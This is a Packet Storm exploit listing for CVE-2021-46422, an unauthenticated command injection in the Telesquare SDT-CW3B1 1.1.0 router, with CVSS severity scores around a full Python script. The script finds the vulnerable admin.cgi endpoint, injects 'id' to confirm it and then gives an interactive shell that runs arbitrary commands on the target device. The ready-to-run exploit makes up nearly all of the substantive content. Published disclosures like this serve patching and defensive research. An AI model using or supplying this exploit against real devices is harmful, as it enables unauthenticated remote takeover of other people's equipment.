Lucene search

K
packetstormBryan LeongPACKETSTORM:167387
HistoryJun 03, 2022 - 12:00 a.m.

Telesquare SDT-CW3B1 1.1.0 Command Injection

2022-06-0300:00:00
Bryan Leong
packetstormsecurity.com
152

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

`#!/usr/bin/python3   
  
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection  
# Date: 24th May 2022  
# Exploit Author: Bryan Leong <NobodyAtall>  
# Vendor Homepage: http://telesquare.co.kr/  
# CVE : CVE-2021-46422  
# Authentication Required: No  
  
import requests   
import argparse   
import sys  
from xml.etree import ElementTree  
  
def sysArgument():  
ap = argparse.ArgumentParser()  
ap.add_argument("--host", required=True, help="target hostname/IP")   
args = vars(ap.parse_args())  
return args['host']  
  
def checkHost(host):  
url = "http://" + host  
  
print("[*] Checking host is it alive?")  
  
try:  
rsl = requests.get(url)   
print("[*] The host is alive.")  
except requests.exceptions.Timeout as err:  
raise SystemExit(err)  
  
def exploit(host):  
url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="   
  
#checking does the CGI exists?  
rsl = requests.get(url)  
  
if(rsl.status_code == 200):  
print("[*] CGI script exist!")  
print("[*] Injecting some shell command.")  
  
#1st test injecting id command  
cmd = "id"  
  
try:  
rsl = requests.get(url + cmd, stream=True)  
xmlparser = ElementTree.iterparse(rsl.raw)  
  
cmdRet = []  
  
for event, elem in xmlparser:  
if(elem.tag == 'CmdResult'):  
cmdRet.append(elem.text)  
except:  
print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")  
sys.exit(0)  
  
if(len(cmdRet) != 0):  
print("[*] There's response from the CGI script!")  
print('[*] System ID: ' + cmdRet[0].strip())  
  
print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")  
#start shell iteration  
while(True):  
cmdInput = input("[SDT-CW3B1 Shell]# ")  
  
if(cmdInput == ".exit"):  
print("[*] Exiting shell.")  
sys.exit(0)  
  
rsl = requests.get(url + cmdInput, stream=True)  
xmlparser = ElementTree.iterparse(rsl.raw)  
  
  
for event, elem in xmlparser:  
if(elem.tag == 'CmdResult'):  
print(elem.text.strip())  
  
print('\n')  
  
else:  
print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")  
sys.exit(0)  
  
else:  
print("[!] CGI script not found.")  
print(rsl.status_code)  
sys.exit(0)  
  
def main():  
host = sysArgument()  
  
checkHost(host)  
exploit(host)  
  
if __name__ == "__main__":  
main()  
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C